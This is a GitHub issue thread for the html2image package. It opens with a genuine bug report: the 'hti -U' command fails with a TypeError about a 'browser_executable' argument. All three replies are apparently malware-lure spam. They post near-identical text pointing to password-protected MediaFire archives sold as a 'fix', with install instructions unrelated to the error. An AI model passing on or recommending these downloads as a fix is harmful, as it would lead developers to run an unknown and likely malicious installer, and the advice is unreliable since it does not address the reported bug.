### ISSUE TITLE
[Bug] Unable to Use Command hti -U

### ISSUE THREAD

**Issue by PencilMario** [vgalin/html2image#156]
```
D:\Windows\Download>hti -U https://www.google.com.hk/
Traceback (most recent call last):
  File "C:\Users\Administrator.DESKTOP-465SP1L\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\Administrator.DESKTOP-465SP1L\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\Administrator.DESKTOP-465SP1L\AppData\Local\Programs\Python\Python310\Scripts\hti.exe\__main__.py", line 7, in <module>
  File "C:\Users\Administrator.DESKTOP-465SP1L\AppData\Local\Programs\Python\Python310\lib\site-packages\html2image\cli.py", line 66, in main
    paths = hti.screenshot(
TypeError: Html2Image.screenshot() got an unexpected keyword argument 'browser_executable'
```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
